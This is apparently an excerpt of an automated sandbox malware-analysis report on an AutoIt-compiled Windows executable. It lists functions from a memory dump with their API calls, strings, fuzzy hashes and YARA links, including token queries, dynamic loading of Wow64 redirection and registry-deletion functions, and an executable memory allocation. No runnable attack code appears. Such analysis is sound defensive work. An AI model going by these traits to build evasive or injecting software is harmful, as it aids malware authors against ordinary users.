QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001A5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001A555E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7bbd7ec3ce3a9f06a157d03cc958ea875b1c27844300f4dbe91b5993bf1effee
Instruction ID: 5bfee760f6df4c860d50fab8edc352d5abc916a12b9e07ebb713ec260172cd13
Opcode Fuzzy Hash: 7bbd7ec3ce3a9f06a157d03cc958ea875b1c27844300f4dbe91b5993bf1effee
Instruction Fuzzy Hash: 7B012175D04A1DDBCF00DFE5E8889EDBB7AFB0A711F05005AE501F2540DB309594C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001985F1, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00198608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00198612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00198621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00198628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019863E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 66c8653702c666b4d9e89d7049d009dcef8e925dad753e8f776a22dfe8da05b0
Instruction ID: ac635b8a04bc5c628a726c6cf7213a1027674f5fb7f63a280feb748cf261ab22
Opcode Fuzzy Hash: 66c8653702c666b4d9e89d7049d009dcef8e925dad753e8f776a22dfe8da05b0
Instruction Fuzzy Hash: D0F04F35201204AFEB100FA9DC89E6B3FAEFF8AB54B140429F945C6150CB65DC82DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00198652, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00198669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00198673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00198682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00198689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0019869F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4917cec13d77f1dd5fd99e1498c11d9517e21899c9111deafed440c10ee3655a
Instruction ID: 5ff771937b5c4f4d1e098cd200728a0a23eb644b83d39d9ea228dd999b3958c3
Opcode Fuzzy Hash: 4917cec13d77f1dd5fd99e1498c11d9517e21899c9111deafed440c10ee3655a
Instruction Fuzzy Hash: 15F04F75200204AFEB111FA6EC88E677FBEFF8A754B14002AF945C6150CB61D982DA60

Uniqueness

Uniqueness Score: -1.00%

Function 0019C6A6, Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0019C6BA
GetWindowTextW.USER32 ref: 0019C6D1
MessageBeep.USER32(00000000), ref: 0019C6E9
KillTimer.USER32(?,0000040A), ref: 0019C705
EndDialog.USER32(?,00000001), ref: 0019C71F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 206a5ee1aed59a9771f095a60d91267e391fc6880a15ac88f5ba5f48dbfb9616
Instruction ID: b9ea92b1e02fe2bc4819937c6020b9518e622dfafb4263ee3f882e2770163278
Opcode Fuzzy Hash: 206a5ee1aed59a9771f095a60d91267e391fc6880a15ac88f5ba5f48dbfb9616
Instruction Fuzzy Hash: 57018130500714ABEF259B60DD8EFA67BB9FF00705F00066DF582A19E1DBF0A9998F80

Uniqueness

Uniqueness Score: -1.00%

Function 001413B0, Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001413BF
StrokeAndFillPath.GDI32(?,?,0017BAD8,00000000,?), ref: 001413DB
SelectObject.GDI32(?,00000000), ref: 001413EE
DeleteObject.GDI32 ref: 00141401
StrokePath.GDI32(?), ref: 0014141C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 6bc3fca1478e02d313a9e75b7beed1afd0af5077085bdcadb664752701a5aaf0
Instruction ID: f8d42dde69bcb1146b9c5755a240c4affa9627b65323aff7853892fcf3f63281
Opcode Fuzzy Hash: 6bc3fca1478e02d313a9e75b7beed1afd0af5077085bdcadb664752701a5aaf0
Instruction Fuzzy Hash: 49F0B230004308ABDB155F66EC0CB583FA6AB01726F08C228F469854F2C73189EADF51

Uniqueness

Uniqueness Score: -1.00%

Function 001AC602, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001AC69D
CoCreateInstance.OLE32(001D2D6C,00000000,00000001,001D2BDC,?), ref: 001AC6B5

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

CoUninitialize.OLE32 ref: 001AC922

Strings

.lnk, xrefs: 001AC631, 001AC659, 001AC663

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 11edffc28d97af7e5a0d8041075579d37ad41ae1fbd2652ab4f4bd1d5652d56b
Instruction ID: 539ce8ad5620d393c0040022d0bee4a589a7115e6be4bc089630d5e85da5f1cf
Opcode Fuzzy Hash: 11edffc28d97af7e5a0d8041075579d37ad41ae1fbd2652ab4f4bd1d5652d56b
Instruction Fuzzy Hash: 87A13D71104205AFD700EF64C891EABB7ECFFA5714F00496DF196972A2DB70EA49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00152E5B, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00160FF6: std::exception::exception.LIBCMT ref: 0016102C
Part of subcall function 00160FF6: __CxxThrowException@8.LIBCMT ref: 00161041

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 00147BB1: _memmove.LIBCMT ref: 00147C0B

__swprintf.LIBCMT ref: 0015302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00152EC6

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9588c547415580fc12f827968dc0402a634d7d169b9a1ff1ae74360afb505d27
Instruction ID: a40b32157fe7674abbaee98bdd3849dfd6c555a5ae8a302ae24e2ffffffa8c0a
Opcode Fuzzy Hash: 9588c547415580fc12f827968dc0402a634d7d169b9a1ff1ae74360afb505d27
Instruction Fuzzy Hash: 90916D71108701DFCB18EF24D895C6FB7A4EFA5750F04491DF9A69B2A1DB20EE48CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0016524D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001652DD

Part of subcall function 00170340: __87except.LIBCMT ref: 0017037B

Strings

pow, xrefs: 001652B5, 001652D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 9490806d913347f9af14baf678dd0cab665c7f29fd44292f130130b3c9ecfcb0
Instruction ID: b79ffd198838269c628a6d14da4c0d3987a54c30bf2405d47bedcf7f1b921501
Opcode Fuzzy Hash: 9490806d913347f9af14baf678dd0cab665c7f29fd44292f130130b3c9ecfcb0
Instruction Fuzzy Hash: 89517C21A1E702CBCB167724CD5137E6BA1AB04750F20CD5DF0DA862E5EF748CE4DA46

Uniqueness

Uniqueness Score: -1.00%

Function 0016023B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00160277
#, xrefs: 00160280

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 0fc4d48bff2a1fc59ac25a7aaa49648ceae5ebd7e2d9fc5d42eebee32a3c1ff7
Instruction ID: dba8467019fd8bc8ac5d84ee57657cdffcc2de6079ca406655adc9a55f9110b1
Opcode Fuzzy Hash: 0fc4d48bff2a1fc59ac25a7aaa49648ceae5ebd7e2d9fc5d42eebee32a3c1ff7
Instruction Fuzzy Hash: 925133741046868FDF1ADFA8C888AFA7BE6FF29310F140055EC91AB2A0D7309C52C760

Uniqueness

Uniqueness Score: -1.00%

Function 001562F2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001563A8
_memmove.LIBCMT ref: 00156446
_memset.LIBCMT ref: 0015646A

Strings

ERCP, xrefs: 00156313

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 78a6fc0eed26c9ecfa415a7760a61394c8b33a1def4f13e9ae1816562d78504a
Instruction ID: 447056f4b3b85eb929651b77c2b09185f92a817fccee01266465c25baf7b85c6
Opcode Fuzzy Hash: 78a6fc0eed26c9ecfa415a7760a61394c8b33a1def4f13e9ae1816562d78504a
Instruction Fuzzy Hash: 3151B171900309EFDB24CF65C8817AABBF4FF14315F60856EEA5ADB241E7719698CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001C7648, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001C76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001C76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 001C7708

Strings

SysMonthCal32, xrefs: 001C769B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 190838ffdd1ee24d2e53106a8be0c29ccd66fa76234826cc602ee56ef0632790
Instruction ID: 138d4a7e348ef5f681f3f52fd080f6818a604b8e292e04293a1b36d7599d98f0
Opcode Fuzzy Hash: 190838ffdd1ee24d2e53106a8be0c29ccd66fa76234826cc602ee56ef0632790
Instruction Fuzzy Hash: 9F219F32504229BBDF15CEA4CC86FEA3B79EB58714F110218FE15AB1D0D7B1E8919BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6F1F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001C6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001C6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001C6FDF

Strings

Listbox, xrefs: 001C6F77

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: e4e7664ec628474e1fe5c38b0e14fd8acad4a7c5b8e6c31c635be2f52f6a2c82
Instruction ID: ba4325b964863b688dd3c5db052d544bc6971bb0e12e253cbb48f3acda934705
Opcode Fuzzy Hash: e4e7664ec628474e1fe5c38b0e14fd8acad4a7c5b8e6c31c635be2f52f6a2c82
Instruction Fuzzy Hash: 5C218032610118BFDF118F54DC85FAB3BAAEF99754F01812CFA549B1A0C771EC518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BC304, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00181D88,?), ref: 001BC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001BC324

Strings

GetSystemWow64DirectoryW, xrefs: 001BC31E
kernel32.dll, xrefs: 001BC30D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 7ffe16f35d1e82777b99787900b00a9721eb7c5407f93f9c78fc29dd0ee7a117
Instruction ID: 4041069ed3bf039c8aeb4227b878fea6ed96a1d05385f8ec71889c64cf9d53a5
Opcode Fuzzy Hash: 7ffe16f35d1e82777b99787900b00a9721eb7c5407f93f9c78fc29dd0ee7a117
Instruction Fuzzy Hash: EAE0EC74600713CFDB204B65D844F967AE5FB18755B84C43DE896D6660E770D885CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00144C95, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00144C2E), ref: 00144CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00144CB5

Strings

kernel32.dll, xrefs: 00144C9E
GetNativeSystemInfo, xrefs: 00144CAF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: c07484f647048b024c6fbbee9bbebc4995250ae6003df765a3b54b0e48c3f377
Instruction ID: 15cff25ed95b82f3053dd42f165a976089e5a2526845c35c362ecbcd4cef9b82
Opcode Fuzzy Hash: c07484f647048b024c6fbbee9bbebc4995250ae6003df765a3b54b0e48c3f377
Instruction Fuzzy Hash: 48D05E70510723CFE7209F71EE59F06BAE6AF15791B19C83ED886DA560E770D8C1CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00144D61, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00144D2E,?,00144F4F,?,002062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00144D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00144D81

Strings

kernel32.dll, xrefs: 00144D6A
Wow64DisableWow64FsRedirection, xrefs: 00144D7B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 17a9f35a3c7fbc9c7e7f9f39b870288e9f2b206c485975f0ffaa6d0a7925842e
Instruction ID: 41513591c25fb144460d46cdfa92a74b5fac1b1d265a55b88ff42475eabb8b25
Opcode Fuzzy Hash: 17a9f35a3c7fbc9c7e7f9f39b870288e9f2b206c485975f0ffaa6d0a7925842e
Instruction Fuzzy Hash: F9D01730910713CFE7209FB1D809B16BAE9AF25352B15C83EA49AD66A0EB70D8C0CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00144D94, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00144CE1,?), ref: 00144DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00144DB4

Strings

Wow64RevertWow64FsRedirection, xrefs: 00144DAE
kernel32.dll, xrefs: 00144D9D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 62a7d656e96c19872b820a4d6231fddb2e28182e372d12c5a1e6b8bda32d43e0
Instruction ID: e5fd9607956defecf2d16f00ded93e2350d375cd1e204b884bcb0ef142dadb13
Opcode Fuzzy Hash: 62a7d656e96c19872b820a4d6231fddb2e28182e372d12c5a1e6b8bda32d43e0
Instruction Fuzzy Hash: 28D01731950713CFD7209FB1D809B46BAE5AF15355B15C83EE8C6D65A0EB70D8C0CA50

Uniqueness

Uniqueness Score: -1.00%

Function 001C1072, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,001C12C1), ref: 001C1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001C1092

Strings

advapi32.dll, xrefs: 001C107B
RegDeleteKeyExW, xrefs: 001C108C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a90eeba5362ecf97b2b5dc2bf6fe48c2e64edc38c39d8159b62f6a84f4cd0421
Instruction ID: 5e0fd9e3edf90f286c704ecbd9fa32457039376b3f80419bae4c7f7c0f2a2980
Opcode Fuzzy Hash: a90eeba5362ecf97b2b5dc2bf6fe48c2e64edc38c39d8159b62f6a84f4cd0421
Instruction Fuzzy Hash: AAD01730560752DFD7209F35D859E2A7AE6AF16361F198C3EA48ADA550E770D8C0CA50

Uniqueness

Uniqueness Score: -1.00%

Function 001B93F5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,001B9009,?,001CF910), ref: 001B9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001B9415

Strings

kernel32.dll, xrefs: 001B93FE
GetModuleHandleExW, xrefs: 001B940F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 4f24b17da653fa2fa3efc51d072badbf67fc296b8d06488e9ecb3d3c84d547ae
Instruction ID: 20237ab2148b10d80e134754ed3804d00ef892f36e6b644b3775bc16b361490e
Opcode Fuzzy Hash: 4f24b17da653fa2fa3efc51d072badbf67fc296b8d06488e9ecb3d3c84d547ae
Instruction Fuzzy Hash: 01D0C7B0600323CFC7208F32CA08A42BEE6AF00341B04C83EE586C2950E770C8C2CA10

Uniqueness

Uniqueness Score: -1.00%

Function 001BE33E, Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 001BE3D2
CharLowerBuffW.USER32(?,?), ref: 001BE415

Part of subcall function 001BDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001BDAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001BE615
_memmove.LIBCMT ref: 001BE628

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c044cddcb2ec88a99ab5d03696fc58606a3e9fa22f6f033fcc048dd56e1ff9e8
Instruction ID: 7b775a03552d72ccb03610553e699a32d68ee4033e2c7f2760eda9a3aff1226a
Opcode Fuzzy Hash: c044cddcb2ec88a99ab5d03696fc58606a3e9fa22f6f033fcc048dd56e1ff9e8
Instruction Fuzzy Hash: 68C148756083119FC714DF28C4809AABBE4FF98718F14896EF899DB361D731E946CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00196DF3, Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00196E04
SysAllocString.OLEAUT32(00000000), ref: 00196EAD
VariantCopy.OLEAUT32 ref: 00196EDC
VariantClear.OLEAUT32(?), ref: 00196F03

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
